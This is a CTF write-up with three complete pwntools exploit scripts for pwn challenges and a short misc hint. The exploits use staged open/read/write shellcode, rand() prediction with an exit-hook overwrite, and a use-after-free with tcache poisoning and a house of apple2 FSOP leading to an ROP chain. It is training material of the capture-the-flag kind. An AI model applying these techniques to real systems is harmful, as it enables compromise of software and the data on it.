pwn1

程序用 read 读入 7 字节并当作代码执行。第一段只发 `pop rdx; syscall`：把栈上的值弹进 rdx 当作新的读取长度，再次触发 read 系统调用（前提是此时 rax 仍为 0、rdi 为 0、rsi 仍指向同一块缓冲区，需在反汇编里确认），第二次就能读入完整的 ORW（open/read/write）shellcode。第二段 payload 前面补 3 个字节，是为了覆盖已经执行过的那 3 字节指令，让新代码正好接在 rip 之后。

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
# ---- environment & target ---------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0  # 1 = local ./pwn (tmux/gdb), 0 = the remote CTF instance
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('47.98.236.4', 5001)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
# Thin wrappers over the tube `p`; each returns whatever the pwntools call returns.


def s(data):
    """send(data) with no trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait until `text` has been received, then send `data` raw."""
    return p.sendafter(text, data)


def sl(data):
    """sendline(data): `data` followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until `text` has been received, then sendline `data`."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to `num` bytes."""
    return p.recv(num)


def rl(text):
    """Receive everything up to and including `text`."""
    return p.recvuntil(text)


def pr(num=4096):
    """Receive up to `num` bytes and echo them to stdout (strict UTF-8 decode: raises on binary output)."""
    return sys.stdout.write(p.recv(num).decode())


def inter():
    """Hand the tube over to the user."""
    return p.interactive()


def l32():
    """Leak a 32-bit libc pointer: read up to the first 0xf7 byte, unpack the last 4 bytes."""
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))


def l64():
    """Leak a 64-bit libc pointer: read up to the first 0x7f byte, unpack the last 6 bytes."""
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def uu32():
    """Unpack the next 4 raw bytes as a little-endian u32."""
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Unpack the next 6 raw bytes as a little-endian u64 (top two bytes zero)."""
    return u64(p.recv(6).ljust(8, b'\x00'))


def int16(data):
    """Parse a hexadecimal string."""
    return int(data, 16)


def lg(s, num):
    """Log `num` in hex under the label `s`."""
    return p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
# Stage 1.  The binary reads 7 bytes into a buffer and executes them (see the
# write-up above), so the first stage is just the 3-byte stub `pop rdx; syscall`:
# it pops a (large) value off the stack into rdx and re-issues the syscall,
# which is read() only if rax is still 0, rdi is 0 and rsi still points at the
# same buffer when the stub runs -- the binary evidently arranges that (typical
# when the buffer is called through an unprototyped function pointer, which
# zeroes eax first); confirm in the disassembly before reusing this trick.
rl("Maybe you need to write some compilations\n")
payload = asm('pop rdx;syscall;')
# gdb.attach(p)
sl(payload)

# Stage 2: open/read/write ("ORW") shellcode assembled from one string.
# open("/flag", O_RDONLY, 0): 0x67616c662f is "/flag" little-endian, so the
# pushed qword is already NUL-terminated; rdi = rsp points at it.
payload = 'xor rax,rax;push 0x00;xor rsi,rsi;xor rdx,rdx;mov rbx,0x67616c662f;push rbx;push rsp;pop rdi;mov rax,2;syscall;'

# read(fd, 0x600500, 0x100): rdi = the fd open() just returned in rax.
# 0x600500 is a hard-coded writable address in the (presumably non-PIE)
# binary -- verify it is mapped RW if the binary changes.
payload += 'mov rdi,rax;mov rsi,0x600500;mov rdx,0x100;xor rax,rax;syscall;'

# write(1, 0x600500, 0x100): dump the flag buffer to stdout.
payload += 'mov rdi,1;mov rsi,0x600500;mov rdx,0x100;mov rax,1;syscall;'
# Manual breakpoint: gives you time to attach a debugger before stage 2 lands.
pause()
# The second read() lands in the same buffer, so its first 3 bytes overwrite
# the already-executed stub; pad them so the new code starts exactly where rip
# continues after the `syscall` instruction.
sl(b'\x00\x00\x00'+ asm(payload))

inter()

image-20240512171623613

pwn2

程序用 srand(time(0)) 播种后比较 rand() 的结果，本地用 ctypes 加载同一份 libc 复现这次 rand() 就能猜中，进入 gift 并泄露 libc 地址（这依赖本地与远程时钟落在同一秒内，猜错就重跑）。之后的栈溢出只能覆盖返回地址的低 6 字节，把它改成 magic 的地址；magic 里的两次 read 等价于一次任意地址写，用它把 exit 流程中会被调用的函数指针（exit_hook，脚本里按 libc_base+0x222060+0xf08 计算，这个偏移取决于 libc 与 ld.so 的映射距离，换环境需要重新测）改成 one_gadget。

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
# ---- environment & target ---------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0  # 1 = local ./pwn (tmux/gdb), 0 = the remote CTF instance
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('47.98.236.4', 5002)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
# Thin wrappers over the tube `p`; each returns whatever the pwntools call returns.


def s(data):
    """send(data) with no trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait until `text` has been received, then send `data` raw."""
    return p.sendafter(text, data)


def sl(data):
    """sendline(data): `data` followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until `text` has been received, then sendline `data`."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to `num` bytes."""
    return p.recv(num)


def rl(text):
    """Receive everything up to and including `text`."""
    return p.recvuntil(text)


def pr(num=4096):
    """Receive up to `num` bytes and echo them to stdout (strict UTF-8 decode: raises on binary output)."""
    return sys.stdout.write(p.recv(num).decode())


def inter():
    """Hand the tube over to the user."""
    return p.interactive()


def l32():
    """Leak a 32-bit libc pointer: read up to the first 0xf7 byte, unpack the last 4 bytes."""
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))


def l64():
    """Leak a 64-bit libc pointer: read up to the first 0x7f byte, unpack the last 6 bytes."""
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def uu32():
    """Unpack the next 4 raw bytes as a little-endian u32."""
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Unpack the next 6 raw bytes as a little-endian u64 (top two bytes zero)."""
    return u64(p.recv(6).ljust(8, b'\x00'))


def int16(data):
    """Parse a hexadecimal string."""
    return int(data, 16)


def lg(s, num):
    """Log `num` in hex under the label `s`."""
    return p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
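# ---- step 1: predict the rand() gate -----------------------------------
# The binary seeds with srand(time(0)) and compares against rand() % 0x6E
# (reduction as mirrored here; confirm in the disassembly).  Reproduce the
# exact same call sequence through the same libc build via ctypes.  This only
# matches while the local and the remote clock agree to the second -- on a
# miss, simply re-run.
libc_c = cdll.LoadLibrary('./libc-2.31.so')
libc_c.srand(libc_c.time(0))
v7 = libc_c.rand()
v6 = v7 % 0x6E
rl("please enter this challenge\n")
sl(str(v6))

# ---- step 2: libc leak from gift ---------------------------------------
# gift prints an address as "0x" + 12 hex digits; recv(12) assumes exactly
# that width, which holds for a 0x7f.. userland libc address.
rl("0x")
puts = int(p.recv(12), 16)
lg("puts", puts)
libc = ELF('./libc-2.31.so')
libc_base = puts - libc.symbols['puts']
lg("libc_base", libc_base)
rl("Come and try it out")

# one_gadget candidates for this libc-2.31 build; the first one's register
# constraints happened to hold at the hooked exit call site.
onegadgets = [0xe3afe, 0xe3b01, 0xe3b04]
onegadget = libc_base + onegadgets[0]
lg("onegadget", onegadget)

# ---- step 3: partial return-address overwrite -> magic ------------------
# 0x20 bytes of filler reach the saved rbp, which is set to exit@GOT (magic
# presumably addresses its read target relative to rbp -- not visible here,
# confirm in the disassembly).  Only the low 6 bytes of the return address are
# overwritten, with magic's address (0x4012c1, non-PIE binary); p64()[:6]
# yields exactly b'\xc1\x12\x40\x00\x00\x00'.  Sent with s(), not sl(): a
# trailing newline would either spill past the 6 bytes or be eaten by magic's
# first read.
magic = 0x4012c1
payload = b'\x00' * 0x20 + p64(elf.got['exit']) + p64(magic)[:6]
s(payload)

# ---- step 4: magic's two reads = one arbitrary 8-byte write -------------
# First the target address, then the value.  The target is the glibc-2.31
# "exit hook": a function pointer exit() calls that lives in ld.so's
# _rtld_global -- 0x222060 is the libc_base -> _rtld_global distance for this
# libc/ld pair and 0xf08 the pointer's offset inside it.  That distance is a
# property of how the loader mapped libc and ld.so, so re-measure it
# (`p &_rtld_global` in gdb) if the remote environment differs.
rl("Congratulations on completing a big step")
s(p64(libc_base + 0x222060 + 0xf08))
# gdb.attach(p,'b exit')
s(p64(onegadget))

inter()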

image-20240512171904642

misc

image-20240512171941880

找到这个包

image-20240512172017410

把这段数据开头的垃圾字符删掉，再把 flag 头替换成 DASCTF 即可。

pwn3

堆题存在 UAF（chunk 释放后仍可 edit/show）：先用 unsorted bin 的 fd 泄露 libc、用 tcache 的 next 指针泄露堆地址，再用 tcache poisoning 把 `_IO_list_all` 指向堆上伪造的 FILE。FILE 的 vtable 设为 `_IO_wfile_jumps`，走 house of apple2 的链（`_IO_wfile_overflow` → `_IO_wdoallocbuf` → 伪造的 `_wide_vtable`），把控制流劫持到 `svcudp_reply+26` 这条 gadget 做栈迁移，最后在堆上跑 open/read/write 的 ROP 链读出 flag。

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
# ---- environment & target ---------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 1  # 1 = local ./pwn (tmux/gdb), 0 = the remote CTF instance
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    # NOTE(review): 5002 is the same port pwn2 uses above -- looks like a
    # copy-paste leftover; confirm pwn3's port before flipping debug to 0.
    p = remote('47.98.236.4', 5002)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
# Thin wrappers over the tube `p`; each returns whatever the pwntools call returns.


def s(data):
    """send(data) with no trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait until `text` has been received, then send `data` raw."""
    return p.sendafter(text, data)


def sl(data):
    """sendline(data): `data` followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until `text` has been received, then sendline `data`."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to `num` bytes."""
    return p.recv(num)


def rl(text):
    """Receive everything up to and including `text`."""
    return p.recvuntil(text)


def pr(num=4096):
    """Receive up to `num` bytes and echo them to stdout (strict UTF-8 decode: raises on binary output)."""
    return sys.stdout.write(p.recv(num).decode())


def inter():
    """Hand the tube over to the user."""
    return p.interactive()


def l32():
    """Leak a 32-bit libc pointer: read up to the first 0xf7 byte, unpack the last 4 bytes."""
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))


def l64():
    """Leak a 64-bit libc pointer: read up to the first 0x7f byte, unpack the last 6 bytes."""
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def uu32():
    """Unpack the next 4 raw bytes as a little-endian u32."""
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Unpack the next 6 raw bytes as a little-endian u64 (top two bytes zero)."""
    return u64(p.recv(6).ljust(8, b'\x00'))


def int16(data):
    """Parse a hexadecimal string."""
    return int(data, 16)


def lg(s, num):
    """Log `num` in hex under the label `s`."""
    return p.success('%s -> 0x%x' % (s, num))


# -----------------------------------------------------------------------
# Symbol source for the libc offsets used below; must be the target's libc.
libc = ELF('./libc.so.6')
def add(index, size, content):
    """Menu option 1: allocate slot `index` with `size` bytes and fill it with `content`.

    `content` is sent raw (no newline), unlike edit(), so callers control the
    exact byte count that reaches the chunk.
    """
    sla("> ", '1')
    sla("Please enter yours Index: \n", str(index))
    sla("Please enter yours Size: \n", str(size))
    sa("Please enter yours Content: \n", content)
def delete(index):
    """Menu option 2: free slot `index` (the slot stays readable/writable -- the UAF)."""
    sla("> ", '2')
    sla("Please enter yours Index: \n", str(index))
def show(index):
    """Menu option 4: print slot `index`; the caller reads the raw bytes that follow."""
    sla("> ", '4')
    sla("Please enter yours Index: \n", str(index))
def edit(index, content):
    """Menu option 3: overwrite slot `index` with `content` plus a newline.

    Works on freed slots too, which is what the fake-FILE writes rely on.
    """
    sla("> ", '3')
    sla("Please enter yours Index: \n", str(index))
    sla("Please enter yours Content: ", content)
# gdb.attach(p,'b _IO_wdoallocbuf')
# for i in range(5):
#     add(i,0x70,'a')

# ---- libc leak ---------------------------------------------------------
# Nine 0x90 chunks, free eight: the first seven fill the 0x90 tcache bin, the
# eighth (index 7) lands in the unsorted bin (chunk 8 still allocated keeps it
# away from top).  show() on the freed chunk (UAF) prints its fd, which points
# into main_arena; 0x1ecbe0 is that offset for this libc.so.6 build.
for i in range(9):
    add(i,0x80,'a')
for i in range(8):
    delete(i)
show(7)
libc_leak = uu64()
lg('libc_leak',libc_leak)
libc_base = libc_leak - 0x1ecbe0
lg("libc_base",libc_base)
# NOTE(review): misnamed and unused -- this is _IO_list_all, not __free_hook.
free_hook = libc_base + libc.sym['_IO_list_all']
IO_list_all = libc_base + libc.symbols['_IO_list_all']
lg("IO_list_all",IO_list_all)
IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
lg("IO_wfile_jumps",IO_wfile_jumps)
# NOTE(review): shadows the builtin open() for the rest of the script.
open = libc_base + libc.sym['open']
read = libc_base + libc.sym['read']
write = libc_base + libc.sym['write']
# svcudp_reply+26 (disassembly quoted below): turns a controlled FILE* in rdi
# into a controlled rbp and an indirect call -- the pivot for the ROP chain.
magic_gadget = libc_base + 0x154dd0 + 26
lg("magic_gadget",magic_gadget)
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
lg("stdout",stdout)
# ROP gadgets; offsets are specific to this libc.so.6 build (`ret` is unused).
ret = 0x0000000000022679 + libc_base
pop_rsi = 0x000000000002601f + libc_base
pop_rdx_r12 = 0x0000000000119211 + libc_base
pop_rdi = 0x0000000000023b6a + libc_base
leave_ret = 0x00000000000578c8 + libc_base
pop_rbp = 0x00000000000226c0 + libc_base

# ---- heap leak ---------------------------------------------------------
# Four 0x80 chunks (indices 9..12) freed into the tcache; glibc 2.31 has no
# safe-linking, so the tcache `next` of the last one freed is a raw heap pointer.
for i in range(4):
    add(i+9,0x70,'a')

# NOTE(review): range(4,-1,-1) also issues delete(13), an index that was never
# allocated.  It evidently did no harm here (presumably free(NULL) or an index
# check on the binary's side), but range(3,-1,-1) frees exactly 12..9.
for i in range(4,-1,-1):
    delete(i+9)

# uu32() reads only 4 bytes, which is enough only because the (presumably
# non-PIE) binary's brk heap lives below 4 GiB; a PIE target needs uu64().
# "heap_base" is a reference point derived from this leak; every later offset
# is relative to it, whether or not it equals the true heap start.
show(9)
heap_leak = uu32()
lg('heap_leak',heap_leak)
heap_base = heap_leak-0x980
lg('heap_base',heap_base)
# edit(9,p64(IO_list_all))
'''
<svcudp_reply+26>: mov rbp,QWORD PTR [rdi+0x48]
<svcudp_reply+30>: mov rax,QWORD PTR [rbp+0x18]
<svcudp_reply+34>: lea r13,[rbp+0x10]
<svcudp_reply+38>: mov DWORD PTR [rbp+0x10],0x0
<svcudp_reply+45>: mov rdi,r13
<svcudp_reply+48>: call QWORD PTR [rax+0x28]
'''
# ---- fake FILE (house of apple2) ----------------------------------------
# The FILE is 0xe0 bytes, so it spans chunks 0 and 1 (0x90 stride: 0x80 data +
# 0x10 header); chunk 1's data therefore starts at FILE+0x90.  Chunk 0 holds:
#   +0x20 _IO_write_base = 0, +0x28 _IO_write_ptr = leave_ret (> base, so
#   _IO_flush_all takes the overflow path; the same qword is also what the
#   gadget's `call [rax+0x28]` ends up using, with rax = this FILE),
#   +0x48 = orw1_addr (the gadget loads [rdi+0x48] into rbp),
#   +0x68 _chain = stdout so the FILE list stays walkable.
orw1_addr = heap_base+0x1310
fake_file = p64(0)*3 + p64(1)
fake_file += p64(0) + p64(leave_ret) + p64(heap_base+0xb10) + p64(heap_base+0xcb8) + p64(heap_base+0xb08) + p64(orw1_addr)  # last qword (+0x48) becomes rbp in the gadget
fake_file = fake_file.ljust(0x68,b'\x00')
fake_file += p64(stdout)
fake_file = fake_file.ljust(0x70,b'\x00')
fake_file = bytes(fake_file)

# Chunk 1 = FILE+0x90: +0xa0 _wide_data -> chunk 2, +0xd8 vtable -> _IO_wfile_jumps.
fake_file1 = p64(0)*2 + p64(heap_base+0x10d0) + p64(0)*6
fake_file1 += p64(IO_wfile_jumps)
fake_file1 = fake_file1.ljust(0x70,b'\x00')
fake_file1 = bytes(fake_file1)

edit(0,fake_file)
edit(1,fake_file1)

# _wide_data (chunk 2): all zero, so _IO_wfile_overflow reaches _IO_wdoallocbuf.
wide_data = p64(0)*2
wide_data = wide_data.ljust(0x70,b'\x00')
wide_data = bytes(wide_data)
edit(2,wide_data)

# Chunk 3 = _wide_data+0x90: +0xe0 _wide_vtable -> heap_base+0x1150, whose
# __doallocate slot (+0x68 -> heap_base+0x11b8) is the next qword, magic_gadget.
wide_data1 = p64(0)*10 + p64(heap_base+0x1150) + p64(magic_gadget)
wide_data1 = wide_data1.ljust(0x70,b'\x00')
wide_data1 = bytes(wide_data1)
edit(3,wide_data1)

# ---- tcache poisoning: point _IO_list_all at the fake FILE ----------------
# Chunk 9 is the tcache head; overwrite its next with _IO_list_all, take chunk
# 9 back (index 13), then the next allocation returns _IO_list_all itself and
# the "content" written there is the fake FILE's address (chunk 0).
edit(9,p64(IO_list_all))
add(13,0x70,'a')
add(14,0x70,p64(heap_base+0xfb0))

# ---- ROP stage 1 (chunk 6, at orw1_addr) ----------------------------------
# After the gadget: rbp = orw1_addr, rax = [rbp+0x18] = the fake FILE, and
# call [rax+0x28] = leave_ret, so rsp = orw1_addr+8 and the chain starts at
# pop_rdx_r12.  The first qword doubles as the "/flag" path (rdi for open).
orw1 = b'/flag\x00\x00\x00'  # the +0x18 entry below is what the gadget loads into rax; [rax+0x28] must be leave_ret
orw1 += p64(pop_rdx_r12) + p64(heap_base+0x1720) + p64(heap_base+0xfb0) + p64(pop_rdi) + p64(heap_base+0x1310) + p64(pop_rsi) + p64(0) + p64(open) + p64(pop_rbp) + p64(heap_base+0x1398) + p64(leave_ret)
edit(6,orw1)

# ---- ROP stage 2 (chunk 7 = heap_base+0x13a0, reached via the pivot above) --
# read(3, heap_base+0x2000, 0x50); write(1, heap_base+0x2000, 0x50).
# fd 3 assumes only stdin/stdout/stderr are open when open() returns.
orw2 = p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_base+0x2000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(read)
orw2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_base+0x2000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(write)

edit(7,orw2)

# ---- trigger -----------------------------------------------------------
# An allocation of 0x100 is requested without supplying content: presumably
# the binary rejects this size and exit()s, and exit's _IO_flush_all walks
# _IO_list_all into the fake FILE.  Confirm the exact trigger in the binary.
rl("> ")
sl('1')
rl("Please enter yours Index: \n")
sl('15')
rl("Please enter yours Size: \n")
sl(str(0x100))


inter()